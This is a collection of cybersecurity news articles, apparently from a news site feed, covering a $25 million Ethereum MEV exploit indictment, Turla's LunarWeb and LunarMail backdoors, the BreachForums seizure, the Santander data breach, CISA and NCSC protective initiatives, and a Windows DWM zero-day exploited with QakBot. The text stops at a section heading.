Gone in 60 seconds is a thing of the past. With the world moving towards digital assets and cryptocurrency, “Gone in 12 seconds” seems to be the new norm for digital heists. The U.S. Department of Justice arrested two siblings for attacking the Ethereum blockchain and siphoning $25 million of cryptocurrency during a 12 second exploit. Hailing from Boston and New York respectively, Anton Peraire-Bueno, 24, and James Peraire-Bueno, 28, stand accused of a litany of charges including conspiracy to commit wire fraud, wire fraud and conspiracy to commit money laundering. According to an unsealed indictment on Wednesday the brothers mixed their “specialized skills” from their education at MIT with their expertise in cryptocurrency trading to exploit “the very integrity of the (Ethereum) blockchain,” said U.S. Attorney Damian Williams. The brothers meticulously planned the exploit scheme for months “and once they put their plan into action, their heist only took 12 seconds to complete,” he added.

“This alleged scheme was novel and has never before been charged.”

Through the Exploit, which is believed to be the very first of its kind, Peraire-Bueno brothers manipulated and tampered with the process and protocols by which transactions are validated and added to the Ethereum blockchain.

The MEV Conundrum from Ethereum Blockchain Exploit

According to the indictment, the Pepaire-Bueno brothers initiated their scheme in December 2022, targeting specific traders on the Ethereum platform through what investigators term a "baiting" operation. At the heart of the indictment lies the concept of MEV-Boost, a software tool utilized by Ethereum validators to optimize transaction processing and maximize profitability. MEV, or maximal extractable value, has long been a subject of controversy within the cryptocurrency community, with proponents arguing its economic necessity and critics highlighting its potential for abuse. They exploited a critical flaw in MEV-Boost's code, granting them unprecedented access to pending transactions before their official validation by Ethereum validators. Leveraging this loophole, the siblings embarked on a sophisticated campaign targeting specific traders utilizing MEV bots. The indictment elucidates the modus operandi employed by the accused duo. The brothers created 16 Ethereum validators and targeted three specific traders who operated MEV bots, the indictment said. By establishing their own Ethereum validators and deploying bait transactions, they enticed MEV bots from these traders for their illicit scheme. Subsequently, through a series of meticulously orchestrated maneuvers, including frontrunning and transaction tampering, they siphoned off $25 million of cryptocurrency from unsuspecting victims – all in just 12 seconds. Following the successful execution of their nefarious scheme, the brothers allegedly laundered the ill-gotten gains through a network of shell companies. Converting the stolen funds into more liquid cryptocurrencies such as DAI and USDC, they attempted to rebuff attempts of victims and Ethereum representatives to recover the stolen cryptocurrency. Following their arrest on Tuesday, the brothers are set to appear in federal courts in New York and Boston to face charges. If convicted the brothers face a maximum sentence of up to 20 years in prison for each count. Deputy Attorney General Lisa Monaco lauded the Justice Department’s prosecutors and IRS agents, “who unraveled this first-of-its kind wire fraud and money laundering scheme.”

“As cryptocurrency markets continue to evolve, the Department will continue to root out fraud, support victims, and restore confidence to these markets.”

Cryptocurrency Heists and Convictions Growing Every Day

The news of the arrest comes on the heels of another crypto heist from Sonne Finance, the cryptocurrency lending protocol. The team at Sonne Finance is offering an undisclosed bounty to a hacker responsible for a $20 million theft on Tuesday evening. Sonne Finance facilitates lending and borrowing without intermediaries like banks. The theft, tracked by blockchain security companies, involved digital coins like ether and USDC. Developers paused all markets and later detailed the attack in a postmortem, offering a bounty for the return of funds. They detected the attack within 25 minutes, with some users preventing $6.5 million theft. The hacker has since been exchanging stolen cryptocurrency for bitcoin and others. Law enforcement focus on crypto theft has intensified in 2024, with notable convictions including a $110 million theft from Mango Markets resulting in up to 30 years in prison and sentences for individuals involved in crypto scams and market manipulation. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Source: securityboulevard.com – Author: Wajahat Raja In the digital realm, security is paramount, especially when it comes to the applications we use daily. Recently, concerns have surfaced regarding vulnerabilities in popular Android applications available on the Google Play Store. Revelations by the Microsoft Threat Intelligence team have unearthed a WPS Office exploit dubbed the Dirty […]

La entrada Xiaomi and WPS Vulnerabilities: File Overwrite Risks Alert – Source: securityboulevard.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

During a recent Senate committee hearing, Director of National Intelligence Avril Haines emphasized state hackers' continued prominence as a threat, citing its aims to undermine trust in U.S. democratic institutions and exacerbate societal divisions. The hearing follows the rise of potential cyberattack on the US election, which has intensified over the last few months, and foreign interference has peaked with many state actors aiming to launch cyberattacks on the upcoming US elections in 2024.  The upcoming 2024 United States elections are slated to take place on Tuesday, November 5, 2024. In this crucial presidential election cycle, the nation will elect its president and vice president. Leveraging the attention to these events, several state-back hackers are running multiple threat campaigns to target the integrity of the US election and possibly accomplish their personal agendas.  Democratic Senator Mark Warner, chairman of the Senate Intelligence Committee, expanded on the scope of foreign influence efforts, including not only state actors but also non-state entities like hacktivists and cybercriminals. Warner stressed the ease with which these actors can now infiltrate and disrupt U.S. politics, emphasizing the increasingly low barriers to entry for such malicious activities. 

Potential Cyberattack on the US Election: A Pressing Concern!

https://www.youtube.com/watch?v=WphVoguvVd8 At the forefront of defending against this potential cyberattack on the US election is the Cybersecurity and Infrastructure Security Agency (CISA). In a recent update on foreign threats to the 2024 elections, CISA Director Jen Easterly outlined the agency's efforts to safeguard election infrastructure since its designation as critical infrastructure in 2017.  "While our election infrastructure is more secure than ever, today’s threat environment is more complex than ever. And we are very clear eyed about this. As the DNI noted, our foreign adversaries remain a persistent threat to our elections, intent on undermining Americans’ confidence in the foundation of our democracy and sowing partisan discord, efforts which could be exacerbated by generative AI capabilities", said Jen Easterly. Despite these persistent threats, Easterly highlighted the successful conduct of secure federal elections in 2018, 2020, and 2022, with no evidence of vote tampering. However, Easterly cautioned against complacency, noting the complexity of ransomware groups/threat actors and their unconventional modus operandi.  Moreover, foreign hackers remain intent on undermining confidence in U.S. democracy, compounded by the proliferation of generative AI capabilities. Moreover, Easterly highlighted the rise in large-scale attacks on US elections, targeting political leaders and other election officials — fueled by baseless claims of electoral fraud.

CISA’s Plan To Bolster Cybersecurity in the Upcoming US Election

In response to these cyberattacks on the upcoming US elections, CISA has intensified its efforts, expanding its services and outreach to election stakeholders across the nation. From cybersecurity assessments to physical security evaluations and training sessions, CISA has been actively engaged in fortifying security in the upcoming election and its infrastructure.  The agency has also ramped up efforts to combat disinformation, providing updated guidance and amplifying the voices of state and local election officials. Despite the political nature of elections, Easterly emphasized that election security remains apolitical. CISA remains steadfast in its commitment to preserving the integrity of the electoral process and looks to the support of leaders in this endeavor.  As the nation prepares for future elections, bolstering cybersecurity measures and defending against foreign  influence operations remain central priorities. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

💾

Researchers recently uncovered two new backdoors implanted within the infrastructure of a European Ministry of Foreign Affairs (MFA) and its diplomatic missions. Slovakian cybersecurity firm ESET who found these two new backdoors dubbed “LunarWeb” and “LunarMail,” attributed them to the Turla cyberespionage group believed to be aligned with Russian interests. Turla has operated since at least 2004, possibly starting in the late 1990s. Linked to the Russian FSB, Turla primarily targets high-profile entities like governments and diplomatic organizations in Europe, Central Asia and the Middle East. Notably, they have breached significant organizations such as the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014. Researchers believe the Lunar toolset that has been used since at least 2020 is an addition to the arsenal of Russia-aligned cyberespionage group Turla based on the similarities between the tools’ tactics, techniques, and procedures (TTPs) and past activities.

LunarWeb Backd: Used to Navigate the Digital Terrain

LunarWeb backdoor stealthily infiltrates servers, establishing its foothold within the targeted infrastructure. Operating covertly, it communicates via HTTP(S) while mirroring legitimate traffic patterns to obfuscate its presence. Concealment is key in LunarWeb's playbook. For this the backdoor used steganography technique. This backdoor covertly embeds commands within innocuous images, effectively evading detection mechanisms. LunarWeb's loader, aptly named LunarLoader, showcases remarkable versatility, the researchers noted. Whether masquerading as trojanized open-source software or operating in standalone form, this entry point demonstrates the adaptability of the adversary's tactics.

LunarMail: Used to Infiltrate Individual Workstations

LunarMail takes a different approach as compared to LunarWeb. It embeds itself within Outlook workstations. Leveraging the familiar environment of email communications, this backdoor carries out its spying activities remaining hidden amidst the daily deluge of digital correspondence that its victims receive on their workstations. [caption id="attachment_68881" align="aligncenter" width="1024"] LunarMail Operation (credit: ESET)[/caption] On first run, the LunarMail backdoor collects information on the environment variables, and email addresses of all outgoing email messages. It then communicates with the command and control server through the  Outlook Messaging API to receive further instructions. LunarMail is capable of writing files, setting email addresses for C&C communication, create arbitrary processes and execute them, take screenshots and more. Similar to its counterpart, LunarMail harnesses the power of steganography albeit within the confines of email attachments. By concealing commands within image files, it perpetuates its covert communication channels undetected. LunarMail's integration with Outlook extends beyond mere infiltration. It manipulates email attachments, seamlessly embedding encrypted payloads within image files or PDF documents which facilitates unsuspicious data exfiltration.

Initial Access and Discovery

The initial access vectors of the Turla hackers, though not definitively confirmed, point towards the exploitation of vulnerabilities or spearphishing campaigns. The abuse of Zabbix network monitoring software is also a potential avenue of compromise, the researchers said. The compromised entities were primarily affiliated with a European MFA, which meant the intrusion was of a strategic nature. The investigation first began with the detection of a loader decrypting and running a payload from an external file, on an unidentified server. This was a previously unknown backdoor, which the researchers named LunarWeb. A similar attack chain with LunarWeb was then found deployed at a diplomatic institution of a European MFA but with a second backdoor – named LunarMail. In another attack, researchers spotted simultaneous deployments of a chain with LunarWeb at three diplomatic institutions of this MFA in the Middle East, occurring within minutes of each other. “The attacker probably had prior access to the domain controller of the MFA and utilized it for lateral movement to machines of related institutions in the same network,” the researchers noted. The threat actors displayed varying degrees of sophistication in the compromises. The coding errors and different coding styles used to develop the backdoors suggested that “multiple individuals were likely involved in the development and operation of these tools.”

Russian State Hackers Biggest Cyber Threat

Recently, Google-owned Mandiant in a detailed report stated with “high confidence” that Russian state-sponsored cyber threat activity poses the greatest risk to elections in regions with Russian interest including the European Union, the United Kingdom and the United States. Russia’s approach to election interference is multifaceted, blending cyber intrusion activities with information operations aimed at influencing public perceptions and sowing discord. Russian state-aligned cyber threat actors target election-related infrastructure for various reasons including applying pressure on foreign governments, amplifying issues aligned with Russia’s national interests, and retaliating against perceived adversaries. Groups like APT28 and UNC4057 conduct cyber espionage and information operations to achieve these objectives, Mandiant said. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Josh Krueger, the Chief Information Security Officer at Project Hosts, Inc. has been appointed to the Federal Secure Cloud Advisory Committee (FSCAC). This prestigious committee plays a crucial role in advising the Federal Risk and Authorization Management Program (FedRAMP) on various aspects of cloud computing adoption and security. The FSCAC appointment recognizes Mr. Krueger's expertise and Project Hosts' ongoing efforts to support secure cloud-computing practices and compliance standards, benefiting users and providers of cloud services. The Federal Risk and Authorization Management Program (FedRAMP) is a government-wide compliance initiative in the United States that offers a standardized framework for security assessment, authorization, and continuous monitoring of cloud products and services.

FSCAC Appointment Includes New Chair and Three Members

Along with Josh Krueger's appointment, Lawrence Hale, the deputy assistant commissioner within the Office of Information Technology Category Management for GSA's Federal Acquisition Service, will serve as the new chair of the FSCAC. In this capacity, Hale will act as a liaison and spokesperson for the committee's work products, in addition to his oversight responsibilities. Josh Krueger, and Kayla Underkoffler, the lead security technologist of HackerOne, will fill the vacant seats. Krueger's term will run through July 9, 2026, while Underkoffler's term will end on May 14, 2025. Carlton Harris, the senior vice president of End to End Solutions, has been appointed as the third new member of the FSCAC, with a three-year term ending on May 14, 2027. While not among the recent appointees, Michael Vacirca, a senior engineering manager at Google, has been reappointed to the federal panel for a full three-year term after serving for one year. His term will conclude on May 14, 2027. As an appointed Representative Member of the FSCAC, Mr. Josh Krueger is expected to bring unique perspectives towards the delivery of FedRAMP's Compliance-as-a-Service solutions. The role at the committee will involve representing the needs and viewpoints of businesses both small and large in the cloud-computing industry, and ensuring their interests are considered in the federal discussions and strategies around cloud adoption.

Responsibilities of the Federal Secure Cloud Advisory Committee

The FSCAC was formed by the General Services Administration in February 2023, in compliance with the FedRAMP Authorization Act of 2022, which is part of the National Defense Authorization Act for fiscal year 2023. The committee's primary responsibilities include advising and providing recommendations to the GSA Administrator, the FedRAMP Board, and various agencies on technical, financial, programmatic, and operational matters related to the secure and effective adoption of cloud computing products and services across different sectors. The committee also plays a significant role in examining the operations of FedRAMP, seeking ways to continually improve authorization processes, and collecting information and feedback on agency compliance with the implementation of FedRAMP requirements. Additionally, the FSCAC serves as a forum for communication and collaboration among all stakeholders within the FedRAMP community. The FSCAC will hold an open meeting on May 20th to discuss its next priorities, which are expected to further enhance the security and adoption of cloud computing solutions across the federal government. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

In the digital realm, security is paramount, especially when it comes to the applications we use daily. Recently, concerns have surfaced regarding vulnerabilities in popular Android applications available on the Google Play Store. Revelations by the Microsoft Threat Intelligence team have unearthed a WPS Office exploit dubbed the Dirty Stream attack, casting a spotlight on […]

The post Xiaomi and WPS Vulnerabilities: File Overwrite Risks Alert appeared first on TuxCare.

The post Xiaomi and WPS Vulnerabilities: File Overwrite Risks Alert appeared first on Security Boulevard.

GhostSec, a threat actor group previously involved in financially motivated cybercrimes, announced a significant shift in their focus to depart from the cybercrime and ransomware operations to their original hacktivist aims. The announcement detailing GhostSec returns to hacktivism roots, would mark a notable change in the group's priorities and operational strategies, leading several to speculate that the stated departure comes after recent law enforcement efforts against international ransomware groups. The GhostSec group identifies itself as part of the Anonymous collective and is known to have been active in their operations since 2015. The group used hashtags such as #GhostSec or #GhostSecurity to promote their activities. The group was previously involved in the #OpISIS, #OpNigeria, and #OpIsrael campaigns.

GhostSec Will Transfer Existing Ransomware Clients to Stormous

In an announcement made on its Telegram channel, the GhostSec group stated that they had gathered sufficient funds from their ransomware operations to support other activities moving forward. Rather than completely abandoning their previous work, this transition includes transferring existing clients to the new Stormous locker by Stormous, a partner organization to whom they will also share the source code of the V3 Ghostlocker ransomware strain. [caption id="attachment_68783" align="alignnone" width="483"] Source: GhostSec Telegram Channel[/caption] They claim that these efforts will ensure a smooth transition to Stormous' services, while avoiding the exit scams or disruption risks typically associated with ransomware exits. Stormous will also take over GhostSec's associates within the Five Families collective, which previously consisted of GhostSec, ThreatSec, Stormous, BlackForums, and SiegedSec. While GhostSec will halt some of its earlier services, the group intends to maintain its private channel and chat room. The group announced a discount offer starting today and lasting until May 23rd for lifetime access to its private channel and chat room, reducing the price from $400 to $250. The group also suggested the possibility of offering a hacking course, although they are still debating the details.

GhostSec Returns to Hacktivism

The announcement expressed GhostSec's intentions to focus solely on hacktivism, a form of activism that employs hacking to promote social or politically driven agendas. GhostSec had a record of intense hacktivist operations and campaigns such as their successful efforts back in 2015 to taken down hundreds of ISIS-associated websites or social media accounts, reportedly halting potential terrorist attacks. The group used social media hashtags like #GhostSec, #GhostSecurity, or #OpISIS to promote their activities and participate in hacktivist initiatives against the terrorist group. GhostSec also promoted a project ("New Blood") to assist newcomers in picking up hacking skills to participate in their campaigns and provided resources to assist activists in anonymizing their identities such as WeFreeInternet, a project that sought to offer free VPN facilities to Iranian activists. The group had stated its intent to expand the project to support activists in similar circumstances who found their internet to be restricted by the governments worldwide. The official GhostSec Telegram channel where the announcement took place had been created on October 25, 2020, and the group is known to utilize its social media handles on various websites to promote its activities. It is important to note that the group's decision to depart from the cybercrime scene does not necessarily imply a shift towards more ethical practices. Furthermore, the group's involvement in financially motivated cybercrimes raises questions about their true motivations and the potential for their hacktivism to be used for personal gain or dubious political agenda rather than genuine social change. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

In response to heightened cyber threats targeting political candidates, election officials and civil society groups, the National Cyber Security Centre (NCSC) in the UK, a part of GCHQ, has introduced a new initiative called the Personal Internet Protection (PIP) service. The service that was unveiled at CYBERUK 2024 in Birmingham, aims to provide an additional layer of security to individuals at “high-risk” of cyberattacks like spear-phishing, malware and other threats, ahead of the upcoming election year. The Personal Internet Protection service works by alerting users when attempting to access malicious domains known to the NCSC and by blocking outgoing traffic to these domains. The PIP offered to high-risk individuals is built on the NCSC’s Protective DNS service that was developed primarily for use by organizations. Since its inception in 2017, PDNS has provided protection at scale for millions of public sector users, handling more than 2.5 trillion site requests and preventing access to 1.5 million malicious domains, the NCSC said.

Cyber Threats Targeting Political Candidates

The Personal Internet Protection service is part of a broader effort by the UK government to enhance cyber support for individuals and organizations crucial to the democratic process, especially considering recent attempts by Russian and Chinese state-affiliated actors to disrupt UK's government and political institutions as well as individuals. While the Russian intelligence services had attempted to use cyberattacks to target prominent persons and organizations in the UK for meddling in the electoral processes, China is likely seen targeting various government agencies including the Ministry of Defence (MoD), whose payroll system was recently breached. Although both, Moscow and Beijing have rejected the use of hacking for political purposes, the relations between them remain strained over these allegations. Jonathon Ellison, NCSC Director for National Resilience and Future Technology, noted the importance of protecting individuals involved in democracy from cyber threats, highlighting the attractiveness of their personal accounts to espionage operations.

“Individuals who play important roles in our democracy are an attractive target for cyber actors seeking to disrupt or otherwise undermine our open and free society. That’s why the NCSC has ramped up our support for people at higher risk of being targeted online to ensure they can better protect their accounts and devices from attacks,” Ellison said.

Ahead of the major election year where more than 50 countries around the world cast their vote, Ellison urged individuals eligible for the Personal Internet Protection services to sign up and to follow their guidance to bolster defenses against various cyber threats. The initiative also extends support to civil society groups facing a heightened risk of cyber threats. A new guide, "Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society," which offers practical advice for individuals such as elected officials, journalists, activists, academics, lawyers and dissidents was released on Tuesday. This guide, developed by the U.S. Cybersecurity and Infrastructure Security Agency in collaboration with international partners, aims to empower high-risk civil society communities with limited resources to combat cyber threats effectively. These include customized risk assessment tools, helplines for digital emergencies and free or discounted cybersecurity services tailored to the needs of civil society organizations. The launch of the Personal Internet Protection service and the release of the guidance for civil society mark significant steps in bolstering the cybersecurity posture of individuals and organizations critical to the democratic process. By enhancing protection against cyber threats, the UK aims to safeguard the integrity of its democracy and promote collective resilience against global threats to democracy. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The notorious BreachForums seized for the second time in a year. The U.S. law enforcement today seized the clear web domain of the second version of BreachForums - popularly known as a Breached hacking forum in the underground market - that helped sell stolen data and credentials. Hosted at BreachForums[.]st, the domain now shows a seizure banner saying the website was taken down by the FBI and the U.S. Department of Justice with assistance from international partners. Other law enforcement authorities worldwide were also part of this action, including the Australian Federal Police, the U.K. National Crime Agency, New Zealand Police, police department of the canton of Zürich in Switzerland and Icelandic Police, among others. As is common with domain seizure messages, law enforcement displayed the logo for the site. It however took an unconventional approach by also featuring two avatar's - likely of BreachForums' administrators "Baphomet" and "ShinyHunters" - behind bars in the seizure banner.

BreachForums Seized

The message on the banner reads: "We are reviewing this site's backend data. If you have information to report about cybercriminal activity on BreachForums, please contact us." The law enforcement has also shared a link to a form hosted on the Internet Crime Complaint Center. The FBI has put out a questionnaire for victims or individuals that have information to assist in any of the investigations against BreachForums v2, BreachForums v1, or Raidforums. A summary of the takedown of BreachForums on this portal says, "The Federal Bureau of Investigation (FBI) is investigating the criminal hacking forums known as BreachForums and Raidforums. "From June 2023 until May 2024, BreachForums (hosted at breachforums.st/.cx/.is/.vc and run by ShinyHunters) was operating as a clear-net marketplace for cybercriminals to buy, sell, and trade contraband, including stolen access devices, means of identification, hacking tools, breached databases, and other illegal services." Earlier a separate version of BreachForums hosted at breached.vc/.to/.co and run by pompompurin between March 2022 to 2023 was seized by the U.S. law enforcement in June 2023. Raidforums, hosted at raidforums.com and run by an admin under the moniker "Omnipotent" was the predecessor hacking forum to both version of BreachForums and ran from early 2015 until February 2022. *The Telegram channel of "Baphomet," one of the administrators behind the BreachForums, has also been seized, according to a pinned message from the law enforcement on his channel. [caption id="attachment_68571" align="aligncenter" width="446"] Credit: Dark Web Intelligence[/caption]

ShinyHunters Confirms Baphomets Arrest

*Shiny Hunters, one of the administrators of the BreachForums, allegedly confirmed on a Telegram channel called "BF Announcements" the arrest of Baphomet and said that the law enforcement did not get to anyone from the ShinyHunters gang. [caption id="attachment_68843" align="aligncenter" width="300"] Message on BF Announcements Telegram channel[/caption] Later in the same channel the administrator claimed that the domain was recovered back from the law enforcement's control, as was the case during the BreachForums v1 takedown where the cat and mouse game went on for a while between the two. The Cyber Express tried to verify this claim and saw that the domain is now redirecting to a Telegram chat group called "Jacuzzi 2.0" The FBI and Justice Department spokespersons were not immediately available for comment when contacted by The Cyber Express for details on the latest claims. This is a developing story. The article will be updated with the latest information as it becomes available. Update 1*: Added Telegram account seizure details along with screenshot. Update 2* May 16 - 9:40 AM (UTC) : Added details from Shiny Hunters' BF Announcements Telegram channel that allegedly confirmed details of one of the administrators of BreachForums - Baphomets - arrest. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

In the realm of cybersecurity, vigilance is paramount. Recently, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) flagged a critical vulnerability in GitLab, a popular platform for collaborative software development. This GitLab password exploit tracked as CVE-2023-7028, has been actively exploited in the wild, posing significant risks to organizations utilizing GitLab for their development workflows. […]

The post CISA Alert: GitLab Password Exploit – Act Now For Protection appeared first on TuxCare.

The post CISA Alert: GitLab Password Exploit – Act Now For Protection appeared first on Security Boulevard.

Santander, one of the largest banks in the eurozone, confirmed that an unauthorized party had gained access to a database containing customer and employee information. The Banco Santander data breach is stated to stem from the database of a third-party provider and limited to the only some of the bank's customers in specific regions where it operated, as well as some of its current and former employees. However, the bank's own operations and systems are reportedly unaffected. Banco Santander is a banking services provider founded on March 21, 1857 and headquartered in Madrid, Spain. The provider operates across Europe, North America, and South America. It's services include global payments services, online bank and digital assets.

Customer and Employee Data Compromised in Santander Data Breach

The bank reported that upon becoming aware of the data breach, it had immediately implemented measures to contain the incident, such as blocking access to its database from the compromised source as well as establishing additional fraud prevention mechanisms to protect impacted customers and affected parties. After conducting an investigation, the bank had determined that the leaked information stemmed from a thid-party database and consisted of details of customers from Santander Chile, Spain and Uruguay regions along with some data on some current and former Santander employees. Despite the third-party database breach, customer data from Santander markets and businesses operating in different regions were not affected. [caption id="attachment_68444" align="alignnone" width="2422"] Source: santander.com[/caption] The bank apologized for the incident and acknowledged concerns arising from the data breach, taking action to directly notify the affected customers and employees. The security team also informed regulators and law enforcement of the incident details, stating that the bank would continue to work with them during the investigation. Santander assured its customers that no transactional data, nor transaction-facilitating credentials such as banking details and passwords were contained in the database. The statement reported that neither the bank's operations nor systems were affected, and that customers could continue with secure transaction operations. Along with the official statement in response to the data breach, the bank had provided additional advice on its site on dealing with the data breach:

• Santander will never ask you for codes, OTPs or passwords.
• Always verify information your receive and contact us through official bank channels.
• If you receive any suspicious message, email or SMS report it to your bank directly or by contacting reportphishing@gruposantander.com.
• Never access your online banking via links from suspicious emails or unsolicited emails.
• Never ignore security notifications or alerts from Santander related to your accounts.

Financial and Banking Sector Hit By Data Breaches

Increased cyber threats or third-party database exposure as in the Santander data breach pose serious concerns for stability within the financial and banking. The International Monetary Fund noted in a blog post last months that these incidents could erode confidence in the financial system, disrupt critical services, or cause spillovers to other institutions. In March, the European Central Bank instructed banks within the European region to implement stronger measures in anticipation of cyber attacks. Earlier, the body had stated that it would conduct a  resilience stest on at least 109 of its directly supervised banks in 2024. The initiatives come as part of broader concern about the security of European banks. Last year, data from the Deutsche Bank AG, Commerzbank AG and ING Groep NV were compromised after the CL0P ransomware group had exploited a security vulnerability in the MOVEit file transfer tool. The European Central Bank's site states that its banking supervisors rely on the stress tests to gather information on and assess how well the banks would able to cope, respond to and recover from a cyberattack, rather than just their ability to prevent attacks. The response and recovery assessments are described to include the activation of emergency procedures and contingency plans as well as the restoration of usual operations. The site states that these test results would then be used to aid supervisors in identifying weaknesses to be discussed in dialogue with the banks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

CISA, in collaboration with DHS, FBI, and international cybersecurity entities, has revealed a comprehensive guide aimed at bolstering cybersecurity for civil society organizations, particularly those facing heightened risks from state-sponsored cyber threats.  The guide, titled "Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society," offers practical steps to enhance digital defenses for nonprofits, advocacy groups, academic institutions, journalists, and other high-risk groups. Talking about this cybersecurity plan for civil society organizations, Jen Easterly, Director of CISA, stated that threat actors aim to undermine democratic and humanitarian values upheld by civil society.  “These high-risk community organizations often lack cyber threat information and security resources. With our federal and international partners, we are providing this resource to help these organizations better understand the cyber threats they face and help them improve their cyber safety”, added Easterly.

CISA, FBI, and DHS Collaborate to Support Cybersecurity for Civil Society

Civil society organizations play a crucial role in upholding democratic values, making them prime targets for malicious cyber activities orchestrated by state-sponsored actors. These threats, often originating from countries like Russia, China, Iran, and North Korea, include sophisticated tactics such as social engineering and spyware deployment. The security guide emphasizes proactive measures and best practices tailored to the unique challenges faced by civil society entities. Recommendations include regular software updates, the adoption of phishing-resistant multi-factor authentication, and the implementation of the principle of least privilege to minimize vulnerabilities. Furthermore, the guide stresses the importance of cybersecurity training, vendor selection diligence, and the development of incident response plans. It also guides individual members of civil society, advising on password security, privacy protection, and awareness of social engineering tactics. The release of this security guidance highlights a broader effort to empower high-risk communities with the knowledge and tools needed to safeguard against cyber threats. International collaboration, as evidenced by partnerships with entities from Canada, Estonia, Japan, and the United Kingdom, further enhances the effectiveness of these initiatives. John Scott-Railton, senior researcher at CitizenLab, emphasized the need for cybersecurity for civil societies on X (previously Twitter). Talking about this new initiative, John stated, “Historically law enforcement & governments in democracies have been achingly slow to recognize this issue and help out groups in need.” Despite some exceptions, the lack of prioritization has resulted in damages, including missed opportunities for accountability and diminished trust. “That's why I'm glad to see this @CISAgov & UK-led joint initiative come to fruition”, added John.

Aiming for Better Protection Against Cyber Threats

Government agencies and cybersecurity organizations worldwide have joined forces to support civil society against online threats. For instance, the FBI, in conjunction with its partners, aims to equip organizations with the capacity to defend against cyber intrusions, ensuring that entities dedicated to human rights and democracy can operate securely. "The FBI and its partners are putting out this guidance so that civil society organizations have the capacity to mitigate the threats that they face in the cyber realm,” said Assistant Director Bryan Vorndran of the FBI’s Cyber Division. Similarly, international partners like Japan's National Center of Incident Readiness and Strategy for Cybersecurity and Estonia's State Information Authority stress the importance of collective action in addressing global cyber threats. These collaborations reflect a shared commitment to bolstering cybersecurity resilience on a global scale. The guide also provides valuable insights into the tactics and techniques employed by state-sponsored actors, enabling organizations to make informed decisions regarding cybersecurity investments and resource allocation. In addition to the guidance document, a range of resources and tools are available to assist high-risk communities in enhancing their cyber defenses. These include customized risk assessment tools, helplines for digital emergencies, and free or discounted cybersecurity services tailored to the needs of civil society organizations. By leveraging these resources and fostering international cooperation, civil society can better defend against cyber threats and continue their vital work in promoting democracy, human rights, and social justice. Through collective efforts and ongoing collaboration, the global community can build a more resilient and secure cyber environment for all. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Microsoft patched a zero-day vulnerability exploited by attackers to distribute QakBot and other malware payloads on susceptible Windows systems. Identified as CVE-2024-30051, this vulnerability is a privilege escalation flaw resulting from a heap-based buffer overflow in the Desktop Window Manager (DWM) core library. Successful exploitation grants attackers “SYSTEM privileges,” Microsoft said.

“These types of bugs are usually combined with a code execution bug to take over a target and are often used by ransomware (actors),” said Dustin Childs of the Zero Day Initiative.

Introduced in Windows Vista, the Desktop Window Manager (dwm.exe) is a compositing window manager that renders all GUI effects in Windows like transparent windows, live taskbar thumbnails, Flip3D, and even high-resolution monitor support. Applications do not draw directly on the screen. Instead, they write their window images to a specific spot in memory. Windows then combines and creates a “composite” of all these windows into one view before sending it to the monitor. This allows Windows to add effects like transparency and animations while displaying the windows. Kaspersky researchers uncovered this vulnerability while investigating another Windows DWM Core Library privilege escalation bug tracked as CVE-2023-36033, also exploited as a zero-day in attacks. While analyzing data related to recent exploits and associated attacks, Kaspersky researchers discovered an intriguing file uploaded to VirusTotal on April 1. The file's name hinted that it contained details on a Windows vulnerability. The file had information regarding a Windows DWM vulnerability – written in broken English - that could be exploited to escalate privileges to SYSTEM level, with the exploitation process nearly mirroring the one used in CVE-2023-36033 attacks, “but the vulnerability was different,” researchers said. Initially skeptical due to the document's quality and lack of crucial details on exploiting the vulnerability, further investigation confirmed the legitimacy of another zero-day vulnerability capable of privilege escalation. Kaspersky promptly reported it to Microsoft, leading to its designation as CVE-2024-30051 and subsequent patching in this month’s Patch Tuesday.

Zero-Day Exploited by QakBot

Following the reporting to Microsoft, Kaspersky continued monitoring for exploits and attacks leveraging this flaw.

“In mid-April we discovered an exploit for this zero-day vulnerability. We have seen it used together with QakBot and other malware and believe that multiple threat actors have access to it,” Kaspersky said.

Security researchers at Google Threat Analysis Group, DBAPPSecurity WeBin Lab, and Google-owned Mandiant also reported the zero-day to Microsoft, pointing to likely widespread exploitation in malware attacks, Childs said.

“Don’t wait to test and deploy this update as exploits are likely to increase now that a patch is available to reverse engineer,” said Childs.

The U.S. Cybersecurity and Infrastructure Security Agency also added CVE-2024-30051 to its Known Exploited Vulnerabilities catalog and directed all federal agencies to complete the patching process by June 4. Kaspersky plans to disclose technical specifics of CVE-2024-30051 once users have had adequate time to update their Windows systems.

QakBot’s Journey from Banking Trojan to Initial Access Broker

